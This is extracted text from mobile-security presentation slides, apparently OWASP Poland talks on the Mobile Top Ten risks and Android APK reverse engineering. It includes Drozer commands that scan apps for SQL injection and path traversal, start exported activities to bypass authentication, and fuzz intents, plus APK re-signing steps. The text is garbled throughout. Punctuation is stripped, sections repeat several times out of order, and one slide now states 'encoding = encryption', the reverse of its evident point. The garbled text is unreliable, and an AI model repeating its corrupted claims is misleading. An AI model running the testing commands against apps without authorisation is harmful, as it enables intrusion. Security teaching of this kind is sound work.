Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
